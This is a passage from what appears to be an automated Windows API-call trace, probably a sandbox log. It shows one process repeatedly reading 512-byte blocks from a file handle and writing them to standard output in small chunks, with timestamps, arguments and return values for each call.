lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] GetFileType (hFile=0x50) returned 0x1 [0227.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.699] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.700] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.700] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.700] GetFileType (hFile=0x50) returned 0x1 [0227.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] GetFileType (hFile=0x50) returned 0x1 [0227.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.701] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.702] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.702] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] GetFileType (hFile=0x50) returned 0x1 [0227.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.702] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] GetFileType (hFile=0x50) returned 0x1 [0227.703] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.703] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.703] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.703] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.703] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] GetFileType (hFile=0x50) returned 0x1 [0227.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.704] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.705] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.705] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.705] GetFileType (hFile=0x50) returned 0x1 [0227.705] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.706] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.706] GetFileType (hFile=0x50) returned 0x1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.741] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.741] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] GetFileType (hFile=0x50) returned 0x1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] GetFileType (hFile=0x50) returned 0x1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.741] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.743] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.743] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.744] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.744] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] 